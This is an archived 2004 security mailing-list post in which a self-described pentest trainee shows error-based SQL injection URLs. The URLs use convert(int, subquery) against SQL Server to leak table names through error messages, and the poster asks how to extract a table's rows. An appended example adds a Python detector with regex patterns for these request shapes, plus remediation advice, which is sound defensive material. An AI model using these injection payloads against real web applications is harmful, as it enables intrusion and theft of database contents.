WebApp Sec mailing list archives

SQL Injection data retrieving??


From: Roland Despins <roland2004 () romandie com>
Date: 10 Sep 2004 12:06:56 -0000



Hi,

I'm practicing for a pentest. I'm trying to retrieve data from a DB using some SQL injections.

From now I assume that my WebApp is vulnerable to SQL injections.

First I've sent this URL:

www.mysite.com/products.asp?id=convert(int,(select top 1 name from sysobjects where xtype='u' order by asc))

And I've got the following error:

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the nvarchar value '__big_field' to a column of data type int.
/products.asp, line 32

I assume that "__big_field" is the name of the database? Right?


Secondly I've sent the following URL in order to get the table name:

www.mysite.com/products.asp?id=convert(int,(select top 1 name from sysobjects where xtype='u' and name>'__big_field' order by 1 asc))


Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the nvarchar value '__dellist' to a column of data type int.
/products.asp, line 32


So "__dellist" is a table from the "__big_field" database? Right?


Now here comes the trouble... I would like to retrieve the column names of the "__dellist" table and the data of the "__dellist".

I've sent: 

www.mysite.com/products.asp?id=convert(int,(select * from __dellist where 1=1))


Error Type:
Microsoft OLE DB Provider for SQL Server (0x80004005)
Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the 
subquery is used as an expression.
/products.asp, line 32


My question is: Which query should I send in order to retrieve the data of the table??


Thanks a lot in advance for your help


Roland
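
Added example, not part of the original post: a defender-side check that flags the request shape quoted above, where the `id` parameter of `products.asp` carries a type conversion wrapped around a subquery instead of an integer. The sample request targets, the function names and the ten-digit limit on `id` are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request targets (not from a real log); the second and
# third mirror the shape of the requests quoted in the post above.
SAMPLE_REQUESTS = [
    "/products.asp?id=42",
    "/products.asp?id=convert(int,(select%20top%201%20name%20from%20sysobjects%20where%20xtype='u'))",
    "/products.asp?id=convert(int,(select%20*%20from%20__dellist%20where%201=1))",
    "/products.asp?id=12abc",
]

# Assumption: a legitimate product id is a plain decimal integer.
INT_RE = re.compile(r"[0-9]{1,10}")
# Markers of error-based enumeration against SQL Server: a type conversion
# wrapped around a subquery, or a reference to the system catalog.
CONVERT_SUBQUERY_RE = re.compile(r"\b(convert|cast)\s*\(.*\(\s*select\b", re.I | re.S)
CATALOG_RE = re.compile(r"\b(sysobjects|syscolumns|information_schema)\b", re.I)

def classify_id(value):
    """Return 'ok', 'malformed' or 'sqli-error-based' for one id value."""
    if INT_RE.fullmatch(value):
        return "ok"
    if CONVERT_SUBQUERY_RE.search(value) or CATALOG_RE.search(value):
        return "sqli-error-based"
    return "malformed"

def scan(requests, param="id"):
    """Classify the given parameter in each request target.

    A request without the parameter is reported as 'malformed'.
    """
    results = []
    for target in requests:
        # parse_qs percent-decodes values and splits name=value on the first '='
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in query.get(param, [""]):
            results.append((target, classify_id(value)))
    return results

if __name__ == "__main__":
    for target, verdict in scan(SAMPLE_REQUESTS):
        print(f"{verdict:18} {target}")
```

The same integer check applied in the application before the value reaches the query, together with a parameterized query and generic error pages, removes both the injection point and the verbose OLE DB error that the requests above depend on.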





